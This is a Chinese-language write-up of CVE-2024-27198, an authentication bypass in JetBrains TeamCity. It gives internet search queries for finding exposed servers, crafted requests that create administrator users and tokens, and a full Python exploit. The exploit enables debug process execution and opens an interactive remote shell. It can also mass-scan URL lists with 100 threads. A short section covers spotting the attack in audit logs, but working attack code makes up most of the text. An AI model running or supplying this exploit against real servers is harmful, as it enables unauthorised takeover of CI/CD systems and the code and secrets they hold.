CVE-2024-27198可RCE身份验证绕过JetBrains TeamCity
- 一、基本原理
- 二、创建新的管理员用户
- 三、自我检查
- 四、POC
一、基本原理
向存在漏洞服务器发送一个不存在的页面请求
?jsp=/app/rest/server;.jsp
这会使服务器报错提供版本信息,且无需登录
Fofa
app=“JET_BRAINS-TeamCity”
ZoomEye
app:“JetBrains TeamCity”
Shodan
http.component:“teamcity”
二、创建新的管理员用户
通过向服务器的用户管理API发送请求,包含所需的用户名和密码
<teamcitysite>/hax?jsp=/app/rest/users;.jsp
或为自己生成管理员token,巩固权限
<teamcitysite>/hax?jsp=/app/rest/users/id:1/tokens/TokenName;.jsp
例如我们可以get‘请求如下
GET <teamcitysite>/hax?jsp=/app/rest/server;.jsp HTTP/1.1
服务器响应如下
C:\Users\>curl -ik http://x.x.x.x:8111/hax?jsp=/app/rest/server;.jsp
HTTP/1.1 200
TeamCity-Node-Id: MAIN_SERVER
Cache-Control: no-store
Content-Type: application/xml;charset=ISO-8859-1
Content-Language: en-IE
Content-Length: 794
Date: Wed, 14 Feb 2024 17:24:59 GMT
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><server version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11" startTime="20240212T021131-0800" currentTime="20240214T092459-0800" buildNumber="147512" buildDate="20240129T000000-0800" internalId="cfb27466-d6d6-4bc8-a398-8b777182d653" role="main_node" webUrl="http://localhost:8111" artifactsUrl=""><projects href="/app/rest/projects"/><vcsRoots href="/app/rest/vcs-roots"/><builds href="/app/rest/builds"/><users href="/app/rest/users"/><userGroups href="/app/rest/userGroups"/><agents href="/app/rest/agents"/><buildQueue href="/app/rest/buildQueue"/><agentPools href="/app/rest/agentPools"/><investigations href="/app/rest/investigations"/><mutes href="/app/rest/mutes"/><nodes href="/app/rest/server/nodes"/></server>
根据该响应确定服务存在漏洞
三、复现过程
下载存在漏洞的版本
docker pull jetbrains/teamcity-server:2023.11.3
启动容器
docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
在http://localhost:8111中完成TeamCity的基本设置
使用管理员账户登录,查看后台User中是否只有当前管理员这个账号
http://localhost:8111/admin/admin.html?item=users
使用POC添加一个新用户(POC在文末)
python3 CVE-2024-27198.py -t http://localhost:8111 -u admin0 -p admin0
回到用户界面可以看到新添加的用户
MetaSploit也发布了针对此漏洞的Module,大家可以自己尝试下。
三、自我检查
看日志UI或文件
可以在日志中看到新用户的创建情况http://localhost:8111/admin/admin.html?item=audit
在文件系统上的 Docker 容器中,TeamCity 日志位于 /opt/teamcity/logs 下:
通过查看 teamcity-activities.log 文件,我们可以看到正在创建的新用户,plugin被上传、禁用和删除,并删除一个新token。
在 teamcity-server.log 中:
四、POC
import random
import string
import urllib3
import argparse
import requests
import xml.etree.ElementTree as ET
from rich.console import Console
from urllib.parse import quote_plus
from alive_progress import alive_bar
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class TeamCity:
def __init__(self, url, os="windows", verbose=False):
self.url = url
self.os = os
self.verbose = verbose
self.console = Console()
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
@staticmethod
def generate_random_credentials():
username = "".join(random.choices(string.ascii_lowercase + string.digits, k=8))
password = "".join(random.choices(string.ascii_letters + string.digits, k=10))
return username, password
def add_user(self):
username, password = self.generate_random_credentials()
user_data = {
"username": username,
"password": password,
"email": f"{username}@example.com",
"roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]},
}
headers = {"Content-Type": "application/json"}
add_user_url = f"{self.url}/hax?jsp=/app/rest/users;.jsp"
try:
response = requests.post(
add_user_url, json=user_data, headers=headers, verify=False
)
if response.status_code == 200:
user_info = self.parse_user_response(response.text)
if user_info:
self.custom_print(
f"User created successfully. Username: {user_info['username']}, ID: {user_info['id']}, Password: {password}",
"+",
)
token_info = self.generate_user_token(user_info["id"])
if token_info:
modify_property = self.modify_internal_properties(
token_info["value"], "rest.debug.processes.enable", "true"
)
self.interactive_shell(
token_info["value"]
) if modify_property else None
else:
self.custom_print("User created but failed to parse response.", "!")
else:
self.custom_print(
f"Failed to create user. Status Code: {response.status_code}", "-"
)
except requests.exceptions.RequestException as e:
self.custom_print(f"Request failed: {e}", "-") if self.verbose else None
def generate_user_token(self, user_id):
token_name = "".join(random.choices(string.ascii_letters + string.digits, k=10))
token_url = (
f"{self.url}/hax?jsp=/app/rest/users/id:{user_id}/tokens/{token_name};.jsp"
)
try:
response = requests.post(token_url, verify=False)
if response.status_code == 200:
token_info = self.parse_token_response(response.text)
if token_info:
self.custom_print(
f"Token created successfully for user ID: {user_id}. Token Name: {token_name}, Token: {token_info['value']}",
"+",
)
return token_info
else:
self.custom_print(
"Token created but failed to parse response.", "!"
)
else:
self.custom_print(
f"Failed to create token. Status Code: {response.status_code}", "-"
)
except requests.exceptions.RequestException as e:
self.custom_print(f"Request failed: {e}", "-")
def parse_user_response(self, response_text):
try:
root = ET.fromstring(response_text)
user_info = {
"username": root.attrib.get("username"),
"id": root.attrib.get("id"),
"email": root.attrib.get("email"),
}
return user_info
except ET.ParseError as e:
self.custom_print(f"Failed to parse user XML response: {e}", "!")
return None
def modify_internal_properties(self, token, key, value):
uri = f"{self.url}/admin/dataDir.html"
headers = {"Authorization": f"Bearer {token}"}
params = {
"action": "edit",
"fileName": "config/internal.properties",
"content": f"{key}={value}" if value else "",
}
try:
response = requests.post(uri, headers=headers, params=params, verify=False)
if response.status_code == 200:
self.custom_print("Internal properties modified successfully.", "+")
return True
else:
self.custom_print(
f"Failed to modify internal properties. Status Code: {response.status_code}",
"-",
)
return False
except requests.exceptions.RequestException as e:
self.custom_print(f"Request failed: {e}", "-")
return False
def execute_remote_command(self, token, os_type="linux", command="whoami"):
headers = {
"Authorization": f"Bearer {token}",
}
match os_type.lower():
case "windows":
exe_path = "cmd.exe"
params = "/c"
case "linux":
exe_path = "/bin/sh"
params = "-c"
command_encoded = quote_plus(command)
execute_url = f"{self.url}/app/rest/debug/processes?exePath={exe_path}¶ms={params}¶ms={command_encoded}"
try:
response = requests.post(execute_url, headers=headers, verify=False)
if response.status_code == 200:
return response.text
else:
return False
except requests.exceptions.RequestException:
return False
def parse_response(self, response_text, parse_type):
try:
root = ET.fromstring(response_text)
if parse_type == "version":
return root.attrib.get("version")
except ET.ParseError as e:
self.custom_print(
f"Failed to parse XML response: {e}", "!"
) if self.verbose else None
return None
def process_users(self, users_xml):
try:
root = ET.fromstring(users_xml)
users_count = root.attrib.get("count", "0")
self.custom_print(f"Total Users: {users_count}", "*")
for user in root.findall("user"):
username = user.attrib.get("username", "N/A")
name = user.attrib.get("name", "N/A")
user_id = user.attrib.get("id", "N/A")
self.custom_print(f"User: {username}, Name: {name}, ID: {user_id}", "*")
except ET.ParseError as e:
self.custom_print(f"Failed to parse users XML response: {e}", "!")
def parse_token_response(self, response_text):
try:
root = ET.fromstring(response_text)
token_info = {
"name": root.attrib.get("name"),
"value": root.attrib.get("value"),
"creationTime": root.attrib.get("creationTime"),
}
return token_info
except ET.ParseError as e:
self.custom_print(f"Failed to parse token XML response: {e}", "!")
return None
def make_request(self):
version_url = f"{self.url}/hax?jsp=/app/rest/server;.jsp"
users_url = f"{self.url}/hax?jsp=/app/rest/users;.jsp"
try:
version_response = requests.get(version_url, verify=False, timeout=20)
users_response = requests.get(users_url, verify=False, timeout=20)
version = self.parse_response(version_response.text, "version")
if version_response.status_code == 200 and version:
self.custom_print(
f"{self.url:<{30}} | Server Version: {version:<{30}} | CVE-2024-27198",
"+",
)
if users_response.status_code == 200 and self.verbose:
self.process_users(users_response.text)
else:
self.custom_print(
"Failed to retrieve user information.", "!"
) if self.verbose else None
return True
else:
self.custom_print(
f"{self.url} is not vulnerable.", "-"
) if self.verbose else None
return False
except requests.exceptions.RequestException as e:
self.custom_print(f"Request failed: {e}", "-") if self.verbose else None
def interactive_shell(self, token):
test_command_output = self.execute_remote_command(
token, self.os, command="echo Ready"
)
if test_command_output:
self.custom_print("Shell is ready, please type your commands UwU", "!")
else:
self.custom_print(
"Failed to execute test command. Remote command execution may not be available.",
"-",
)
return
session = PromptSession(history=InMemoryHistory())
while True:
try:
cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
match cmd.lower():
case "exit":
break
case "clear":
self.console.clear()
case _:
output = self.execute_remote_command(
token, self.os, command=cmd
)
if output:
self.custom_print(f"Output:\n{output}", "+")
else:
self.custom_print("Failed to execute command.", "-")
except KeyboardInterrupt:
self.modify_internal_properties(
token, "rest.debug.processes.enable", "false"
)
break
def scan_url(url, output):
team_city = TeamCity(url)
if team_city.make_request():
with open(output, "a") as file:
file.write(f"{url}\n")
def main():
parser = argparse.ArgumentParser(
description="""
Exploit script for CVE-2024-27198: Demonstrates an authentication bypass vulnerability in JetBrains TeamCity versions prior to 2023.11.4.
This tool can add a user with administrative privileges or list users on vulnerable servers, providing a proof of concept for unauthorized admin actions."""
)
parser.add_argument("-u", "--url", type=str, help="URL to TeamCity server.")
parser.add_argument(
"--add-user",
action="store_true",
help="Add a new user with random credentials and parse response.",
)
parser.add_argument(
"--payload-type",
type=str,
default="linux",
help="Payload type ('linux' or 'windows').",
)
parser.add_argument(
"-l", "--list", type=str, help="File containing list of URLs to process."
)
parser.add_argument(
"-o",
"--output",
type=str,
help="Path to the output file where results will be saved.",
)
args = parser.parse_args()
if args.list:
urls = []
with open(args.list, "r") as file:
urls = [line.strip() for line in file.readlines()]
with alive_bar(len(urls), enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=100) as executor:
future_to_url = {
executor.submit(scan_url, url, args.output): url for url in urls
}
for _ in as_completed(future_to_url):
bar()
elif args.url:
team_city = TeamCity(args.url, args.payload_type, verbose=True)
if args.add_user:
team_city.add_user()
else:
team_city.make_request()
else:
parser.print_help()
if __name__ == "__main__":
main()